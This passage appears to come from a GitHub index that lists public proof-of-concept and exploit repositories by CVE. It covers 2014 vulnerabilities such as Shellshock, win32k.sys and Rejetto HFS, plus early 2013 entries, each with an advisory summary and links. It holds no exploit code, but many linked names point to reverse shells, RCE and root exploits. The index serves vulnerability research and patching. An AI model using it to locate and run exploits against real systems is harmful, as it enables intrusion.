- [fungoshacks/CVE-2014-4076](https://github.com/fungoshacks/CVE-2014-4076)
### CVE-2014-4109 (2014-09-10)
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4110, and CVE-2014-4111.
- [day6reak/CVE-2014-4109](https://github.com/day6reak/CVE-2014-4109)
### CVE-2014-4113 (2014-10-15)
win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows local users to gain privileges via a crafted application, as exploited in the wild in October 2014, aka "Win32k.sys Elevation of Privilege Vulnerability."
- [johnjohnsp1/CVE-2014-4113](https://github.com/johnjohnsp1/CVE-2014-4113)
- [nsxz/Exploit-CVE-2014-4113](https://github.com/nsxz/Exploit-CVE-2014-4113)
- [sam-b/CVE-2014-4113](https://github.com/sam-b/CVE-2014-4113)
- [wikiZ/cve-2014-4113](https://github.com/wikiZ/cve-2014-4113)
### CVE-2014-4140 (2014-10-15)
Microsoft Internet Explorer 8 through 11 allows remote attackers to bypass the ASLR protection mechanism via a crafted web site, aka "Internet Explorer ASLR Bypass Vulnerability."
- [day6reak/CVE-2014-4140](https://github.com/day6reak/CVE-2014-4140)
### CVE-2014-4210 (2014-07-17)
Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.
- [NoneNotNull/SSRFX](https://github.com/NoneNotNull/SSRFX)
- [0xn0ne/weblogicScanner](https://github.com/0xn0ne/weblogicScanner)
- [unmanarc/CVE-2014-4210-SSRF-PORTSCANNER-POC](https://github.com/unmanarc/CVE-2014-4210-SSRF-PORTSCANNER-POC)
- [NHPT/WebLogic-SSRF_CVE-2014-4210](https://github.com/NHPT/WebLogic-SSRF_CVE-2014-4210)
### CVE-2014-4321
- [android-rooting-tools/libmsm_vfe_read_exploit](https://github.com/android-rooting-tools/libmsm_vfe_read_exploit)
### CVE-2014-4322 (2014-12-24)
drivers/misc/qseecom.c in the QSEECOM driver for the Linux kernel 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, does not validate certain offset, length, and base values within an ioctl call, which allows attackers to gain privileges or cause a denial of service (memory corruption) via a crafted application.
- [retme7/CVE-2014-4322_poc](https://github.com/retme7/CVE-2014-4322_poc)
- [laginimaineb/cve-2014-4322](https://github.com/laginimaineb/cve-2014-4322)
- [askk/CVE-2014-4322_adaptation](https://github.com/askk/CVE-2014-4322_adaptation)
- [koozxcv/CVE-2014-4322](https://github.com/koozxcv/CVE-2014-4322)
### CVE-2014-4323 (2014-12-12)
The mdp_lut_hw_update function in drivers/video/msm/mdp.c in the MDP display driver for the Linux kernel 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, does not validate certain start and length values within an ioctl call, which allows attackers to gain privileges via a crafted application.
- [marcograss/cve-2014-4323](https://github.com/marcograss/cve-2014-4323)
### CVE-2014-4377 (2014-09-18)
Integer overflow in CoreGraphics in Apple iOS before 8 and Apple TV before 7 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.
- [feliam/CVE-2014-4377](https://github.com/feliam/CVE-2014-4377)
- [davidmurray/CVE-2014-4377](https://github.com/davidmurray/CVE-2014-4377)
### CVE-2014-4378 (2014-09-18)
CoreGraphics in Apple iOS before 8 and Apple TV before 7 allows remote attackers to obtain sensitive information or cause a denial of service (out-of-bounds read and application crash) via a crafted PDF document.
- [feliam/CVE-2014-4378](https://github.com/feliam/CVE-2014-4378)
### CVE-2014-4481 (2015-01-30)
Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.
- [feliam/CVE-2014-4481](https://github.com/feliam/CVE-2014-4481)
### CVE-2014-4511 (2014-07-22)
Gitlist before 0.5.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the file name in the URI of a request for a (1) blame, (2) file, or (3) stats page, as demonstrated by requests to blame/master/, master/, and stats/master/.
- [michaelsss1/gitlist-RCE](https://github.com/michaelsss1/gitlist-RCE)
### CVE-2014-4671 (2014-07-09)
Adobe Flash Player before 13.0.0.231 and 14.x before 14.0.0.145 on Windows and OS X and before 11.2.202.394 on Linux, Adobe AIR before 14.0.0.137 on Android, Adobe AIR SDK before 14.0.0.137, and Adobe AIR SDK & Compiler before 14.0.0.137 do not properly restrict the SWF file format, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks against JSONP endpoints, and obtain sensitive information, via a crafted OBJECT element with SWF content satisfying the character-set requirements of a callback API.
- [cph/rabl-old](https://github.com/cph/rabl-old)
### CVE-2014-4688 (2014-07-02)
pfSense before 2.1.4 allows remote authenticated users to execute arbitrary commands via (1) the hostname value to diag_dns.php in a Create Alias action, (2) the smartmonemail value to diag_smart.php, or (3) the database value to status_rrd_graph_img.php.
- [andyfeili/CVE-2014-4688](https://github.com/andyfeili/CVE-2014-4688)
### CVE-2014-4699 (2014-07-09)
The Linux kernel before 3.15.4 on Intel processors does not properly restrict use of a non-canonical value for the saved RIP address in the case of a system call that does not use IRET, which allows local users to leverage a race condition and gain privileges, or cause a denial of service (double fault), via a crafted application that makes ptrace and fork system calls.
- [vnik5287/cve-2014-4699-ptrace](https://github.com/vnik5287/cve-2014-4699-ptrace)
### CVE-2014-4936 (2014-12-16)
The upgrade functionality in Malwarebytes Anti-Malware (MBAM) consumer before 2.0.3 and Malwarebytes Anti-Exploit (MBAE) consumer 1.04.1.1012 and earlier allow man-in-the-middle attackers to execute arbitrary code by spoofing the update server and uploading an executable.
- [0x3a/CVE-2014-4936](https://github.com/0x3a/CVE-2014-4936)
### CVE-2014-4943 (2014-07-19)
The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the Linux kernel through 3.15.6 allows local users to gain privileges by leveraging data-structure differences between an l2tp socket and an inet socket.
- [redes-2015/l2tp-socket-bug](https://github.com/redes-2015/l2tp-socket-bug)
### CVE-2014-5139 (2014-08-13)
The ssl_set_client_disabled function in t1_lib.c in OpenSSL 1.0.1 before 1.0.1i allows remote SSL servers to cause a denial of service (NULL pointer dereference and client application crash) via a ServerHello message that includes an SRP ciphersuite without the required negotiation of that ciphersuite with the client.
- [uthrasri/CVE-2014-5139](https://github.com/uthrasri/CVE-2014-5139)
- [uthrasri/G2.5_openssl_CVE-2014-5139](https://github.com/uthrasri/G2.5_openssl_CVE-2014-5139)
### CVE-2014-5284 (2014-12-02)
host-deny.sh in OSSEC before 2.8.1 writes to temporary files with predictable filenames without verifying ownership, which allows local users to modify access restrictions in hosts.deny and gain root privileges by creating the temporary files before automatic IP blocking is performed.
- [mbadanoiu/CVE-2014-5284](https://github.com/mbadanoiu/CVE-2014-5284)
### CVE-2014-5460 (2014-09-11)
Unrestricted file upload vulnerability in the Tribulant Slideshow Gallery plugin before 1.4.7 for WordPress allows remote authenticated users to execute arbitrary code by uploading a PHP file, then accessing it via a direct request to the file in wp-content/uploads/slideshow-gallery/.
- [brookeses69/CVE-2014-5460](https://github.com/brookeses69/CVE-2014-5460)
### CVE-2014-6271 (2014-09-24)
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
- [dlitz/bash-cve-2014-6271-fixes](https://github.com/dlitz/bash-cve-2014-6271-fixes)
- [npm/ansible-bashpocalypse](https://github.com/npm/ansible-bashpocalypse)
- [ryancnelson/patched-bash-4.3](https://github.com/ryancnelson/patched-bash-4.3)
- [jblaine/cookbook-bash-CVE-2014-6271](https://github.com/jblaine/cookbook-bash-CVE-2014-6271)
- [rrreeeyyy/cve-2014-6271-spec](https://github.com/rrreeeyyy/cve-2014-6271-spec)
- [scottjpack/shellshock_scanner](https://github.com/scottjpack/shellshock_scanner)
- [Anklebiter87/Cgi-bin_bash_Reverse](https://github.com/Anklebiter87/Cgi-bin_bash_Reverse)
- [justzx2011/bash-up](https://github.com/justzx2011/bash-up)
- [mattclegg/CVE-2014-6271](https://github.com/mattclegg/CVE-2014-6271)
- [ilismal/Nessus_CVE-2014-6271_check](https://github.com/ilismal/Nessus_CVE-2014-6271_check)
- [RainMak3r/Rainstorm](https://github.com/RainMak3r/Rainstorm)
- [gabemarshall/shocknaww](https://github.com/gabemarshall/shocknaww)
- [woltage/CVE-2014-6271](https://github.com/woltage/CVE-2014-6271)
- [ariarijp/vagrant-shellshock](https://github.com/ariarijp/vagrant-shellshock)
- [themson/shellshock](https://github.com/themson/shellshock)
- [securusglobal/BadBash](https://github.com/securusglobal/BadBash)
- [villadora/CVE-2014-6271](https://github.com/villadora/CVE-2014-6271)
- [APSL/salt-shellshock](https://github.com/APSL/salt-shellshock)
- [teedeedubya/bash-fix-exploit](https://github.com/teedeedubya/bash-fix-exploit)
- [internero/debian-lenny-bash_3.2.52-cve-2014-6271](https://github.com/internero/debian-lenny-bash_3.2.52-cve-2014-6271)
- [u20024804/bash-3.2-fixed-CVE-2014-6271](https://github.com/u20024804/bash-3.2-fixed-CVE-2014-6271)
- [u20024804/bash-4.2-fixed-CVE-2014-6271](https://github.com/u20024804/bash-4.2-fixed-CVE-2014-6271)
- [u20024804/bash-4.3-fixed-CVE-2014-6271](https://github.com/u20024804/bash-4.3-fixed-CVE-2014-6271)
- [francisck/shellshock-cgi](https://github.com/francisck/shellshock-cgi)
- [proclnas/ShellShock-CGI-Scan](https://github.com/proclnas/ShellShock-CGI-Scan)
- [sch3m4/RIS](https://github.com/sch3m4/RIS)
- [ryeyao/CVE-2014-6271_Test](https://github.com/ryeyao/CVE-2014-6271_Test)
- [cj1324/CGIShell](https://github.com/cj1324/CGIShell)
- [renanvicente/puppet-shellshock](https://github.com/renanvicente/puppet-shellshock)
- [indiandragon/Shellshock-Vulnerability-Scan](https://github.com/indiandragon/Shellshock-Vulnerability-Scan)
- [ramnes/pyshellshock](https://github.com/ramnes/pyshellshock)
- [akiraaisha/shellshocker-python](https://github.com/akiraaisha/shellshocker-python)
- [352926/shellshock_crawler](https://github.com/352926/shellshock_crawler)
- [kelleykong/cve-2014-6271-mengjia-kong](https://github.com/kelleykong/cve-2014-6271-mengjia-kong)
- [huanlu/cve-2014-6271-huan-lu](https://github.com/huanlu/cve-2014-6271-huan-lu)
- [sunnyjiang/shellshocker-android](https://github.com/sunnyjiang/shellshocker-android)
- [P0cL4bs/ShellShock-CGI-Scan](https://github.com/P0cL4bs/ShellShock-CGI-Scan)
- [hmlio/vaas-cve-2014-6271](https://github.com/hmlio/vaas-cve-2014-6271)
- [opsxcq/exploit-CVE-2014-6271](https://github.com/opsxcq/exploit-CVE-2014-6271)
- [Pilou-Pilou/docker_CVE-2014-6271.](https://github.com/Pilou-Pilou/docker_CVE-2014-6271.)
- [zalalov/CVE-2014-6271](https://github.com/zalalov/CVE-2014-6271)
- [heikipikker/shellshock-shell](https://github.com/heikipikker/shellshock-shell)
- [0x00-0x00/CVE-2014-6271](https://github.com/0x00-0x00/CVE-2014-6271)
- [kowshik-sundararajan/CVE-2014-6271](https://github.com/kowshik-sundararajan/CVE-2014-6271)
- [w4fz5uck5/ShockZaum-CVE-2014-6271](https://github.com/w4fz5uck5/ShockZaum-CVE-2014-6271)
- [Aruthw/CVE-2014-6271](https://github.com/Aruthw/CVE-2014-6271)
- [cved-sources/cve-2014-6271](https://github.com/cved-sources/cve-2014-6271)
- [shawntns/exploit-CVE-2014-6271](https://github.com/shawntns/exploit-CVE-2014-6271)
- [Sindadziy/cve-2014-6271](https://github.com/Sindadziy/cve-2014-6271)
- [wenyu1999/bash-shellshock](https://github.com/wenyu1999/bash-shellshock)
- [Sindayifu/CVE-2019-14287-CVE-2014-6271](https://github.com/Sindayifu/CVE-2019-14287-CVE-2014-6271)
- [Any3ite/CVE-2014-6271](https://github.com/Any3ite/CVE-2014-6271)
- [somhm-solutions/Shell-Shock](https://github.com/somhm-solutions/Shell-Shock)
- [rashmikadileeshara/CVE-2014-6271-Shellshock-](https://github.com/rashmikadileeshara/CVE-2014-6271-Shellshock-)
- [Dilith006/CVE-2014-6271](https://github.com/Dilith006/CVE-2014-6271)
- [cyberharsh/Shellbash-CVE-2014-6271](https://github.com/cyberharsh/Shellbash-CVE-2014-6271)
- [MuirlandOracle/CVE-2014-6271-IPFire](https://github.com/MuirlandOracle/CVE-2014-6271-IPFire)
- [mochizuki875/CVE-2014-6271-Apache-Debian](https://github.com/mochizuki875/CVE-2014-6271-Apache-Debian)
- [b4keSn4ke/CVE-2014-6271](https://github.com/b4keSn4ke/CVE-2014-6271)
- [hadrian3689/shellshock](https://github.com/hadrian3689/shellshock)
- [akr3ch/CVE-2014-6271](https://github.com/akr3ch/CVE-2014-6271)
- [0xConstant/CVE-2014-6271](https://github.com/0xConstant/CVE-2014-6271)
- [Gurguii/cgi-bin-shellshock](https://github.com/Gurguii/cgi-bin-shellshock)
- [anujbhan/shellshock-victim-host](https://github.com/anujbhan/shellshock-victim-host)
- [FilipStudeny/-CVE-2014-6271-Shellshock-Remote-Command-Injection-](https://github.com/FilipStudeny/-CVE-2014-6271-Shellshock-Remote-Command-Injection-)
- [mritunjay-k/CVE-2014-6271](https://github.com/mritunjay-k/CVE-2014-6271)
- [Brandaoo/CVE-2014-6271](https://github.com/Brandaoo/CVE-2014-6271)
- [Jsmoreira02/CVE-2014-6271](https://github.com/Jsmoreira02/CVE-2014-6271)
- [hanmin0512/CVE-2014-6271_pwnable](https://github.com/hanmin0512/CVE-2014-6271_pwnable)
- [0xTabun/CVE-2014-6271](https://github.com/0xTabun/CVE-2014-6271)
- [0xN7y/CVE-2014-6271](https://github.com/0xN7y/CVE-2014-6271)
- [AlissonFaoli/Shellshock](https://github.com/AlissonFaoli/Shellshock)
- [hackintoanetwork/shellshock](https://github.com/hackintoanetwork/shellshock)
- [ajansha/shellshock](https://github.com/ajansha/shellshock)
- [K3ysTr0K3R/CVE-2014-6271-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2014-6271-EXPLOIT)
- [TheRealCiscoo/Shellshock-Exploit](https://github.com/TheRealCiscoo/Shellshock-Exploit)
### CVE-2014-6287 (2014-10-07)
The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aks HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action.
- [roughiz/cve-2014-6287.py](https://github.com/roughiz/cve-2014-6287.py)
- [Nicoslo/Windows-exploitation-Rejetto-HTTP-File-Server-HFS-2.3.x-CVE-2014-6287](https://github.com/Nicoslo/Windows-exploitation-Rejetto-HTTP-File-Server-HFS-2.3.x-CVE-2014-6287)
- [wizardy0ga/THM-Steel_Mountain-CVE-2014-6287](https://github.com/wizardy0ga/THM-Steel_Mountain-CVE-2014-6287)
- [mrintern/thm_steelmountain_CVE-2014-6287](https://github.com/mrintern/thm_steelmountain_CVE-2014-6287)
- [hadrian3689/rejetto_hfs_rce](https://github.com/hadrian3689/rejetto_hfs_rce)
- [randallbanner/Rejetto-HTTP-File-Server-HFS-2.3.x---Remote-Command-Execution](https://github.com/randallbanner/Rejetto-HTTP-File-Server-HFS-2.3.x---Remote-Command-Execution)
- [0xTabun/CVE-2014-6287](https://github.com/0xTabun/CVE-2014-6287)
- [zhsh9/CVE-2014-6287](https://github.com/zhsh9/CVE-2014-6287)
### CVE-2014-6332 (2014-11-11)
OleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via a crafted web site, as demonstrated by an array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka "Windows OLE Automation Array Remote Code Execution Vulnerability."
- [MarkoArmitage/metasploit-framework](https://github.com/MarkoArmitage/metasploit-framework)
- [tjjh89017/cve-2014-6332](https://github.com/tjjh89017/cve-2014-6332)
- [mourr/CVE-2014-6332](https://github.com/mourr/CVE-2014-6332)
### CVE-2014-6577 (2015-01-21)
Unspecified vulnerability in the XML Developer's Kit for C component in Oracle Database Server 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality via unknown vectors. NOTE: the previous information is from the January 2015 CPU. Oracle has not commented on the original researcher's claim that this is an XML external entity (XXE) vulnerability in the XML parser, which allows attackers to conduct internal port scanning, perform SSRF attacks, or cause a denial of service via a crafted (1) http: or (2) ftp: URI.
- [SecurityArtWork/oracle-xxe-sqli](https://github.com/SecurityArtWork/oracle-xxe-sqli)
### CVE-2014-6598 (2015-01-21)
Unspecified vulnerability in the Oracle Communications Diameter Signaling Router component in Oracle Communications Applications 3.x, 4.x, and 5.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to Signaling - DPI.
- [KPN-CISO/DRA_writeup](https://github.com/KPN-CISO/DRA_writeup)
### CVE-2014-6721 (2014-09-26)
The Pharmaguideline (aka com.pharmaguideline) application 1.2.0 for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
- [sagisar1/CVE-2014-6721-exploit-Shellshock](https://github.com/sagisar1/CVE-2014-6721-exploit-Shellshock)
### CVE-2014-7169 (2014-09-25)
GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.
- [chef-boneyard/bash-shellshock](https://github.com/chef-boneyard/bash-shellshock)
- [gina-alaska/bash-cve-2014-7169-cookbook](https://github.com/gina-alaska/bash-cve-2014-7169-cookbook)
- [Gobinath-B/SHELL-SCHOCK](https://github.com/Gobinath-B/SHELL-SCHOCK)
### CVE-2014-7205 (2014-10-08)
Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for the hapi server framework for Node.js allows remote attackers to execute arbitrary Javascript code via unspecified vectors.
- [maximilianmarx/bassmaster-rce](https://github.com/maximilianmarx/bassmaster-rce)
- [AndrewTrube/CVE-2014-7205](https://github.com/AndrewTrube/CVE-2014-7205)
### CVE-2014-7236 (2020-02-17)
Eval injection vulnerability in lib/TWiki/Plugins.pm in TWiki before 6.0.1 allows remote attackers to execute arbitrary Perl code via the debugenableplugins parameter to do/view/Main/WebHome.
- [m0nad/CVE-2014-7236_Exploit](https://github.com/m0nad/CVE-2014-7236_Exploit)
### CVE-2014-7911 (2014-12-15)
luni/src/main/java/java/io/ObjectInputStream.java in the java.io.ObjectInputStream implementation in Android before 5.0.0 does not verify that deserialization will result in an object that met the requirements for serialization, which allows attackers to execute arbitrary code via a crafted finalize method for a serialized object in an ArrayMap Parcel within an intent sent to system_service, as demonstrated by the finalize method of android.os.BinderProxy, aka Bug 15874291.
- [retme7/CVE-2014-7911_poc](https://github.com/retme7/CVE-2014-7911_poc)
- [ele7enxxh/CVE-2014-7911](https://github.com/ele7enxxh/CVE-2014-7911)
- [heeeeen/CVE-2014-7911poc](https://github.com/heeeeen/CVE-2014-7911poc)
- [GeneBlue/cve-2014-7911-exp](https://github.com/GeneBlue/cve-2014-7911-exp)
- [koozxcv/CVE-2014-7911](https://github.com/koozxcv/CVE-2014-7911)
- [koozxcv/CVE-2014-7911-CVE-2014-4322_get_root_privilege](https://github.com/koozxcv/CVE-2014-7911-CVE-2014-4322_get_root_privilege)
- [mabin004/cve-2014-7911](https://github.com/mabin004/cve-2014-7911)
### CVE-2014-7920 (2017-04-13)
mediaserver in Android 2.2 through 5.x before 5.1 allows attackers to gain privileges. NOTE: This is a different vulnerability than CVE-2014-7921.
- [laginimaineb/cve-2014-7920-7921](https://github.com/laginimaineb/cve-2014-7920-7921)
- [Vinc3nt4H/cve-2014-7920-7921_update](https://github.com/Vinc3nt4H/cve-2014-7920-7921_update)
### CVE-2014-8110 (2015-02-12)
Multiple cross-site scripting (XSS) vulnerabilities in the web based administration console in Apache ActiveMQ 5.x before 5.10.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
- [tafamace/CVE-2014-8110](https://github.com/tafamace/CVE-2014-8110)
### CVE-2014-8142 (2014-12-20)
Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate keys within the serialized properties of an object, a different vulnerability than CVE-2004-1019.
- [3xp10it/php_cve-2014-8142_cve-2015-0231](https://github.com/3xp10it/php_cve-2014-8142_cve-2015-0231)
### CVE-2014-8244 (2014-11-01)
Linksys SMART WiFi firmware on EA2700 and EA3500 devices; before 2.1.41 build 162351 on E4200v2 and EA4500 devices; before 1.1.41 build 162599 on EA6200 devices; before 1.1.40 build 160989 on EA6300, EA6400, EA6500, and EA6700 devices; and before 1.1.42 build 161129 on EA6900 devices allows remote attackers to obtain sensitive information or modify data via a JNAP action in a JNAP/ HTTP request.
- [JollyJumbuckk/LinksysLeaks](https://github.com/JollyJumbuckk/LinksysLeaks)
### CVE-2014-8275 (2015-01-09)
OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not enforce certain constraints on certificate data, which allows remote attackers to defeat a fingerprint-based certificate-blacklist protection mechanism by including crafted data within a certificate's unsigned portion, related to crypto/asn1/a_verify.c, crypto/dsa/dsa_asn1.c, crypto/ecdsa/ecs_vrf.c, and crypto/x509/x_all.c.
- [uthrasri/Openssl_G2.5_CVE-2014-8275](https://github.com/uthrasri/Openssl_G2.5_CVE-2014-8275)
- [uthrasri/CVE-2014-8275_openssl_g2.5](https://github.com/uthrasri/CVE-2014-8275_openssl_g2.5)
### CVE-2014-8609 (2014-12-15)
The addAccount method in src/com/android/settings/accounts/AddAccountSettings.java in the Settings application in Android before 5.0.0 does not properly create a PendingIntent, which allows attackers to use the SYSTEM uid for broadcasting an intent with arbitrary component, action, or category information via a third-party authenticator in a crafted application, aka Bug 17356824.
- [locisvv/Vulnerable-CVE-2014-8609](https://github.com/locisvv/Vulnerable-CVE-2014-8609)
- [MazX0p/CVE-2014-8609-POC](https://github.com/MazX0p/CVE-2014-8609-POC)
- [ratiros01/CVE-2014-8609-exploit](https://github.com/ratiros01/CVE-2014-8609-exploit)
### CVE-2014-8682 (2014-11-21)
Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.
- [nihal1306/gogs](https://github.com/nihal1306/gogs)
### CVE-2014-8729
- [inso-/TORQUE-Resource-Manager-2.5.x-2.5.13-stack-based-buffer-overflow-exploit-CVE-2014-8729-CVE-2014-878](https://github.com/inso-/TORQUE-Resource-Manager-2.5.x-2.5.13-stack-based-buffer-overflow-exploit-CVE-2014-8729-CVE-2014-878)
### CVE-2014-8731 (2017-03-23)
PHPMemcachedAdmin 1.2.2 and earlier allows remote attackers to execute arbitrary PHP code via vectors related "serialized data and the last part of the concatenated filename," which creates a file in webroot.
- [sbani/CVE-2014-8731-PoC](https://github.com/sbani/CVE-2014-8731-PoC)
### CVE-2014-8757 (2015-02-17)
LG On-Screen Phone (OSP) before 4.3.010 allows remote attackers to bypass authorization via a crafted request.
- [irsl/lgosp-poc](https://github.com/irsl/lgosp-poc)
### CVE-2014-9016 (2014-11-24)
The password hashing API in Drupal 7.x before 7.34 and the Secure Password Hashes (aka phpass) module 6.x-2.x before 6.x-2.1 for Drupal allows remote attackers to cause a denial of service (CPU and memory consumption) via a crafted request.
- [c0r3dump3d/wp_drupal_timing_attack](https://github.com/c0r3dump3d/wp_drupal_timing_attack)
- [Primus27/WordPress-Long-Password-Denial-of-Service](https://github.com/Primus27/WordPress-Long-Password-Denial-of-Service)
### CVE-2014-9222 (2014-12-24)
AllegroSoft RomPager 4.34 and earlier, as used in Huawei Home Gateway products and other vendors and products, allows remote attackers to gain privileges via a crafted cookie that triggers memory corruption, aka the "Misfortune Cookie" vulnerability.
- [BenChaliah/MIPS-CVE-2014-9222](https://github.com/BenChaliah/MIPS-CVE-2014-9222)
- [donfanning/MIPS-CVE-2014-9222](https://github.com/donfanning/MIPS-CVE-2014-9222)
### CVE-2014-9295 (2014-12-20)
Multiple stack-based buffer overflows in ntpd in NTP before 4.2.8 allow remote attackers to execute arbitrary code via a crafted packet, related to (1) the crypto_recv function when the Autokey Authentication feature is used, (2) the ctl_putdata function, and (3) the configure function.
- [MacMiniVault/NTPUpdateSnowLeopard](https://github.com/MacMiniVault/NTPUpdateSnowLeopard)
### CVE-2014-9301 (2014-12-07)
Server-side request forgery (SSRF) vulnerability in the proxy servlet in Alfresco Community Edition before 5.0.a allows remote attackers to trigger outbound requests to intranet servers, conduct port scans, and read arbitrary files via a crafted URI in the endpoint parameter.
- [ottimo/burp-alfresco-referer-proxy-cve-2014-9301](https://github.com/ottimo/burp-alfresco-referer-proxy-cve-2014-9301)
### CVE-2014-9322 (2014-12-17)
arch/x86/kernel/entry_64.S in the Linux kernel before 3.17.5 does not properly handle faults associated with the Stack Segment (SS) segment register, which allows local users to gain privileges by triggering an IRET instruction that leads to access to a GS Base address from the wrong space.
- [RKX1209/CVE-2014-9322](https://github.com/RKX1209/CVE-2014-9322)
### CVE-2014-9390 (2020-02-12)
Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem.
- [hakatashi/CVE-2014-9390](https://github.com/hakatashi/CVE-2014-9390)
### CVE-2014-10069 (2018-01-07)
Hitron CVE-30360 devices use a 578A958E3DD933FC DES key that is shared across different customers' installations, which makes it easier for attackers to obtain sensitive information by decrypting a backup configuration file, as demonstrated by a password hash in the um_auth_account_password field.
- [aimoda/hitron-cfg-decrypter](https://github.com/aimoda/hitron-cfg-decrypter)
### CVE-2014-91371
- [jamaal001/CVE-2014-91371-Wordpress-](https://github.com/jamaal001/CVE-2014-91371-Wordpress-)
## 2013
### CVE-2013-0156 (2013-01-13)
active_support/core_ext/hash/conversions.rb in Ruby on Rails before 2.3.15, 3.0.x before 3.0.19, 3.1.x before 3.1.10, and 3.2.x before 3.2.11 does not properly restrict casts of string values, which allows remote attackers to conduct object-injection attacks and execute arbitrary code, or cause a denial of service (memory and CPU consumption) involving nested XML entity references, by leveraging Action Pack support for (1) YAML type conversion or (2) Symbol type conversion.
- [terracatta/name_reverser](https://github.com/terracatta/name_reverser)
- [heroku/heroku-CVE-2013-0156](https://github.com/heroku/heroku-CVE-2013-0156)
- [josal/crack-0.1.8-fixed](https://github.com/josal/crack-0.1.8-fixed)
- [bsodmike/rails-exploit-cve-2013-0156](https://github.com/bsodmike/rails-exploit-cve-2013-0156)
- [R3dKn33-zz/CVE-2013-0156](https://github.com/R3dKn33-zz/CVE-2013-0156)
- [Jjdt12/kuang_grade_mk11](https://github.com/Jjdt12/kuang_grade_mk11)
### CVE-2013-0212 (2013-02-24)
store/swift.py in OpenStack Glance Essex (2012.1), Folsom (2012.2) before 2012.2.3, and Grizzly, when in Swift single tenant mode, logs the Swift endpoint's user name and password in cleartext when the endpoint is misconfigured or unusable, allows remote authenticated users to obtain sensitive information by reading the error messages.
- [LogSec/CVE-2013-0212](https://github.com/LogSec/CVE-2013-0212)
### CVE-2013-0229 (2013-01-31)
The ProcessSSDPRequest function in minissdp.c in the SSDP handler in MiniUPnP MiniUPnPd before 1.4 allows remote attackers to cause a denial of service (service crash) via a crafted request that triggers a buffer over-read.
- [lochiiconnectivity/vulnupnp](https://github.com/lochiiconnectivity/vulnupnp)
### CVE-2013-0269 (2013-02-13)
The JSON gem before 1.5.5, 1.6.x before 1.6.8, and 1.7.x before 1.7.7 for Ruby allows remote attackers to cause a denial of service (resource consumption) or bypass the mass assignment protection mechanism via a crafted JSON document that triggers the creation of arbitrary Ruby symbols or certain internal objects, as demonstrated by conducting a SQL injection attack against Ruby on Rails, aka "Unsafe Object Creation Vulnerability."
